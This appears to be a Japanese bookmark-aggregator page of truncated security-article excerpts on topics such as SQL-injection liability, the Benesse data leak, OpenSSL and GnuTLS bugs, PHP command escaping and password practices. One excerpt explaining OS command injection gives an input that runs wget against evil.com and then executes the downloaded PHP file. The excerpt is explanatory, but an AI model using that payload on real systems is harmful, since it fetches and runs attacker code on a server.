SQLインジェクション対策もれの責任を開発会社に問う判決
ポイントは下記の通りです。 X社(原告)はセキュリティ対策について特に指示はしていなかった 損害賠償について個別契約に定める契約金額の範囲内とする損害賠償責任制限があった 当初システムはカード決済を外部委託し直接カード情報を扱っていなかった X社が「カード会社毎の決済金額を知りたい」とY社に依頼をして、その結果カード情報をいったんDBに保存する仕様となった(2010年1月29日) X社からの問い合わせに対してY社は、カード情報を保持しない方式に変更することが可能で、そのほうが安全となり、費用は20万円程度である旨を伝えた(2010年9月27日)が、その後X社は改良の指示をしなかった 以下の脆弱性その他が認められた システム管理機能のIDとパスワードが admin/password であった 個人情報が記載されたお問い合わせログファイルの閲覧が可能(ディレクトリリスティングと意図しないファイ
ベネッセの情報漏えい事件を分析 問題点と今後の可能性とは何か
ベネッセコーポレーションから大量の個人情報が漏えいした背景や問題点は何か? 今後はどうなるのか? 情報セキュリティと内部不正の専門家である萩原栄幸氏が検証する。 ベネッセから確定したものだけで760万人分、最大では2070万人分(可能性)もの大量の個人情報が漏えいする事件が発生した。事件の概要は有り余る程の情報が報道されているので本稿では割愛するが、次の切り口から分析してみたい。 ベネッセの問題点(どうすべきだったか?) 法律上の問題点 ベネッセの対応ついて、評価できること、まずかったこと 今後の可能性 ベネッセの問題点(どうすべきだったか?) 簡単なことである。まず外部から攻撃の場合、基本的にはその保護されているシステムそのものの脆弱性を突いて内部への侵入を図る(例外もあるが)。パスワードなどを奪取する場合でも、その奪取するきっかけは脆弱性を突いた犯行が多い。 しかし、組織内部の場合はシ
CCS Injection脆弱性(CVE-2014-0224)発見の経緯についての紹介 - OpenSSL #ccsinjection Vulnerability
菊池です。CCS Injection脆弱性(CVE-2014-0224)発見の経緯について紹介します。 バグの簡単な解説 OpenSSLがハンドシェーク中に不適切な状態でChangeCipherSpecを受理してしまうのが今回のバグです。 このバグはOpenSSLの最初のリリースから存在していました。 通常のハンドシェークでは、右の図のような順序でメッセージを交換します(RFC5246 The Transport Layer Security (TLS) Protocol Version 1.2 §7.3より作成)。 ChangeCipherSpecは必ずこの位置で行うことになっています。OpenSSLもChangeCipherSpecをこのタイミングで送信しますが、受信は他のタイミングでも行うようになっていました。これを悪用することで、攻撃者が通信を解読・改ざん可能です。 発見の困難さ
「GnuTLS」に新たな脆弱性、主要Linuxディストリビューションに影響
悪用された場合、GnuTLSを使っているTLS/SSLクライアントで任意のコードを実行される恐れもある。 Red Hat、Debian、Ubuntuなどの主要Linuxディストリビューションに使われているオープンソースのSSL/TLSライブラリ「GnuTLS」に新たな脆弱性が見つかり、修正パッチがリリースされた。悪用された場合、クライアントサイドで任意のコードを実行される可能性が指摘されている。 Red Hatが公開したセキュリティ情報によれば、この脆弱性に関する情報は5月28日に公開され、6月3日までに修正パッチが公開された。GnuTLSでTLS/SSLハンドシェイクのServer HelloパケットからのセッションIDを解析する方法に脆弱性があり、不正なサーバを使って過度に長いセッションIDを送り付けることにより、GnuTLS経由で接続しているTLS/SSLクライアントをバッファオーバ
パスワード入力直後に預金奪う新たな手口 NHKニュース
インターネットバンキングの預金が奪われる被害で、利用者が偽の画面にパスワードを誤って入力した瞬間に預金を奪うという新たな手口の被害が相次いでいることが分かり、銀行はウイルス対策の徹底などを呼びかけています。 インターネットバンキングで預金を奪われる被害は、これまで利用者が偽の画面に誤って入力したパスワードが後から悪用されるケースが中心でした。 しかし、「三井住友銀行」によりますと、ことし3月以降、利用者が偽の画面に誤ってパスワードを入力した瞬間に預金を奪うという新たな手口による被害が相次いでいるということです。 ログインすると「ダウンロード中です」などと書かれた偽の画面が表示され、振り込みなどに必要なパスワードを入力するとその直後に預金が奪われるということです。 三井住友銀行は、対策として去年10月、1分ごとにパスワードが変わる仕組みを導入しましたが、今回は、この仕組みの利用者でも被害が確
PHPのescapeshellcmdの危険性 - 徳丸浩の日記
補足 この記事は旧徳丸浩の日記からの転載です(元URL、アーカイブ、はてなブックマーク1、はてなブックマーク2)。 備忘のため転載いたしますが、この記事は2011年1月1日に公開されたもので、当時の徳丸の考えを示すものを、基本的に内容を変更せずにそのまま転載するものです。 補足終わり 本を書いています。初稿を一通り書き上げ、第2稿を作成中です。その過程で見つけたことを報告します。 PHPのescapeshellcmdはパラメータをクォートしないので呼び出し側でクォートする必要がありますが、escapeshellcmdの仕様がまずいために、呼び出し側でクォートしても突破できることが分かりました。 escapeshellcmdの仕様 PHPにはシェルのパラメータをエスケープする関数が2つあります。escapeshellargとescapeshellcmdです。escapeshellargは、エ
PHPだってシェル経由でないコマンド呼び出し機能が欲しい
このエントリはPHP Advent Calendar 2013 in Adventar の21日目です。 OSコマンドインジェクションとは OSコマンドインジェクションという脆弱性があります。PHPから外部コマンドを呼んでいる場合に、意図したコマンドとは別のコマンドを外部から指定され、実行されてしまうものです。 下記のように、myprog をパラメータ指定で起動している場合で説明します。$paramはファイル名やメールアドレスなどを想定しています。 $param = $_GET['param']; system("myprog $param"); $paramとして ; wget http://evil.com/bad.php ; php bad.php を指定されると、system関数で実行するコマンドは下記となります。 myprog ; wget http://evil.com/ba
GitHubに大規模な不正ログイン試行 | 徳丸浩の日記
GitHubのブログおよび国内の報道によると、GitHubに対して大規模な不正ログインが試みられたようです。 GitHubは米国時間の2013年11月19日、ブルートフォース攻撃を受けたことを明らかにした。攻撃の時期や被害を受けたアカウント数は公にしていないが、今回の攻撃を踏まえ、より強固なパスワードや二要素認証などを利用するようユーザーに呼び掛けている。 GitHubにブルートフォース攻撃、一部のパスワードが破られるより引用 私もGitHubアカウントがありますのでSecurity Historyページを確認したところ、不正ログインの試行が確認されました。IPアドレスは、ベネズエラ、タイ、ブラジルのものです。 GitHubアカウントをお持ちの方は、念のためSecurity Historyを確認することを推奨します。 今回の不正ログインの特徴は以下のようなものです。 少数の「弱いパスワード
パスワードが漏洩しないウェブアプリの作り方 〜 ソルトつきハッシュで満足する前に考えるべきこと
■■序論 徳丸さんのスライド「いまさら聞けないパスワードの取り扱い方」に見られるように、昨今、ウェブアプリケーションの設計要件として、サーバ内に侵入された場合でもユーザーのパスワードをできるだけ保護すべきという論調が見受けられるようになってきました。 上掲のスライドでは、その手法としてソルトつきハッシュ化を勧めています。しかしながらスライドに書かれているとおり、ソルトつきハッシュには、複雑なパスワードの解読は困難になるものの、単純なパスワードを設定してしまっているユーザーのパスワードについては十分な保護を提供できないという問題があります。そして、多くのユーザーは適切なパスワード運用ができない、というのが悲しい現実です。 ソルトつきハッシュを使った手法でこのような問題が残るのは、ウェブアプリケーションサーバに侵入した攻撃者がユーザーの認証情報をダウンロードして、認証情報をオフライン攻撃するこ
ChromeやFirefoxからパスワードが“丸見え”に
有江敬寛 ケーティーコンサルティング専務取締役。ITに携わる全ての人のITスキル向上を目的として「IT向上委員会」を設立、委員長を務める。現在ワコムのペンタブレット「WACOM Bamboo Comic」とセルシスの漫画制作ソフト「Comic Studio Pro」を利用して「IT4コマ漫画」を執筆中。 関連記事 IT4コマ漫画:“ツートップ”のボタン位置 NTTドコモが「ツートップ」として大々的に販促している2機種のスマホ。いずれもAndroid端末だが、操作感はまるで別物――? IT向上委員会の有江敬寛氏による漫画連載「IT4コマ漫画」の第37回目。 IT4コマ漫画:スマホのアンテナ、どう使う? 最新型スマートフォンを買ってご満悦の部長。さっそくアンテナを伸ばして通話を試みるも……。IT向上委員会の有江敬寛氏による漫画連載「IT4コマ漫画」の第36回目。 IT4コマ漫画:“舞台を掃除す
Masato Kinugawa Security Blog: たぶんXSSが理由でインターネットがとまった
昔自分が利用者だったサイトのセキュリティ問題(XSS)をいくつか報告していたのですが、おそらくそのリクエストを理由にインターネットが使えなくなりました。プロバイダに接続を止められたのです。 そのサイトで問題をみつけたとき、サービス提供者側の反応を示す兆候がありました。 問題を発見後、しばらくしてアクセスしようとすると、アクセスを拒否されたからです。 サービス提供者には問題を報告し、アクセス拒否についても、一応、今報告してる通りこれは攻撃ではないので誤解なきようよろしくとメール連絡したところ、問題は修正されました。 これで真意は伝わり、アクセスと関連付けられ、アクセス拒否に対する誤解も解決しただろうと思ったのですが、その後急にインターネットが使えない事態にまでなるとはだれが予想できたでしょうか…。(今は携帯の回線を使っています) プロバイダから書面が届き、書面には問題の報告時とほぼ同じ日付に
パスワードの定期的変更について徳丸さんに聞いてみた(1)
高橋: こんにちは、高橋です。今日は徳丸さんをお招きして、パスワードの定期的変更問題についてお話を伺います。徳丸さん、よろしくお願いします。 徳丸: 徳丸です。よろしくお願いします。 高橋: まず、お伺いしたいことですが、パスワードを定期的に変更すべしという根拠には、どのようなものがあるのでしょうか? 徳丸: 大きく分けて2つの理由が挙げられていると思います。一つは、パスワードを定期的に変更すると、パスワードを破って侵入する攻撃の予防になるというもの、すなわち事前の予防策です。もう一つは、パスワードが漏洩した際に、被害を軽減できるというもので、事後の緩和策ということですね。 高橋: もう少し詳しくお願いします。 徳丸: まず、「事前」の方ですが、オンライン攻撃とオフライン攻撃があります。 高橋: オンライン攻撃とはどのようなものでしょうか? 徳丸: オンライン攻撃は、ネット経由でパスワード
ちょっとセキュアな「いつもの」パスワード - ぼくはまちちゃん!
こんにちはこんにちは!! 最近はメールでもなんでもWEB上の便利なサービスが増えてきましたね…! でも、いろいろ登録しすぎて、いよいよぼくもパスワードが管理できなくなってきました…! えっ! もしかして面倒だから、ぜんぶ同じパスワード使ってたりするるんでしょうか…! だめです!だめだめ!それはだめ。 全部のサイトで同じパスワードにするのってものすごく危険ですよ!!! これはほんと! だって、もしなにかあって、どれかひとつのパスワードがばれちゃったら全部芋づるだから…! 登録したWEBサイトの管理者の中に悪い人がいる可能性もあるし。 (個人運営のサイトはもちろん、たとえ大きな企業のサイトでもバイトちゃんが見れたりとか…) でもだからといって全部別のものにすると覚えられないんだよね。 たとえば自分宛にメールしておくとか… Dropboxのような共有フォルダにパスワードのメモいれとくとか… パス
全部のサービスで異なるパスワードを使うべし、IPAが勧告
国内のインターネットサービスで不正ログインが相次いでいる事態を受けて、IPAは「パスワードを使い回さないように」と呼び掛けている。 情報処理推進機構(IPA)は8月1日、国内の主要サービスで不正ログイン事件が相次いでいる事態を受けて、インターネットユーザーを対象に利用する全てのインターネットサービスにおいて異なるパスワードを利用するよう呼び掛けた。 一連の事件では第三者が何らかの方法で入手したログイン情報を別のサービスでのログインに使用し、ログインに成功した場合にサービスが悪用されてしまう。不正ログインの成功率は低いものの、攻撃者が試行を重ねることで、実際に成功したケースは少なくないとみられる。 その背景には「同じパスワードをインターネットサービスで使い回す利用者が多いことが挙げられる」(IPA)とし、パスワードを強固にしてセキュリティソフトを利用していても、パスワードを使い回していればこ
ニュース - あなたのパスワード、バレてます(WIRED.jp):ITpro
マット・ホーナン|MAT HONAN US版『WIRED』およびWIRED.comガジェットラボのシニア・ライター。この記事の速報はWIRED.comで大ヒットとなった。 人生を狂わすパスワード 手元の秘密がひとつ暴かれるだけで、あなたの人生は崩壊しかねない。そもそも、その秘密は意外とガードがゆるい。無頓着な人なら6文字、警戒心の強い人なら16文字。その簡単な文字列が、あなたのすべてをあらわにしてしまう。 メール、銀行口座、住所にクレジットカードの番号から、子どもたちの写真、いまこの文章を読んでいるあなたの居場所まで、パスワードさえあれば大切な情報は守ることができるとされてきた。しかし、それは迷信、幻想、時代遅れだ。 パスワードがどんなに複雑でも、独特でも、個人情報は守れない。 いまやハッカーがコンピューターシステムに侵入してユーザー名とパスワードの一覧をウェブで公開したり、それを転売した
パスワードを設定する時に必ず守るべき4つの基本事項 | ライフハッカー・ジャパン
分かり難いパスワードを設定することがいかに大切かということは、ライフハッカーでも口を酸っぱくして何度も言ってきました。それでもまだ多くの人が、分かりやすくて安直なパスワードを使い続けています。3,200万人分のパスワードを分析しても、未だによくあるパスワードの上位はこんな感じ(画像参照)なのです。 去年の12月、FacebookなどのSNSにマルチメディアスライドショーなどを提供している「RockYou」が、パスワードデータベースの情報を漏洩しました。3,200万人分のパスワードとログイン情報が、一人のハッカーの手によって公に晒されてしまったのです。 セキュリティ会社の「Imperva」は、3,200万人のパスワードをくまなく調べ分析しました。その結果、RockYouのユーザーが設定しているパスワードの欠点と、パスワードがあまりにも更新されなさ過ぎるという嘆かわしい事実を、「Consume
実際、パスワードはどれくらいの頻度で変えるべきですか? | ライフハッカー・ジャパン
ライフハッカー編集部様 私の会社やいくつかのウェブサイトが、パスワードを定期的(たとえば3カ月おき)に変えるように強制してきます。基本的にパスワードはどれくらいの頻度で変えるべきなのでしょうか? 使い古しのパスワード(Stale Passwords)より 使い古しのパスワードさん、こんにちは。 多くの組織がユーザーにパスワードの変更を強制しています。長い間、それがセキュリティーの「ベストプラクティス」だと考えられてきたからです。しかし、実際には賛否両論のテーマなのです。以下にパスワードの変更が「有効であるケース」と「有効でないケース」について解説します。■なぜ企業はパスワードに有効期限を設けているのか? パスワードを定期的に変える利点は、パスワードが盗まれた場合に、犯人がシステムに侵入できる期間を制限できることです。もし、パスワードに有効期限がなく、またパスワードが盗まれたことにも気づかな
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
TwitterのOAuthの問題まとめ
【セキュリティ ニュース】「Heartbleed」の影響についてアナウンスを - IPA呼びかけ(1ページ目 / 全1ページ):Security NEXT
http://japan.internet.com/allnet/20130912/4.html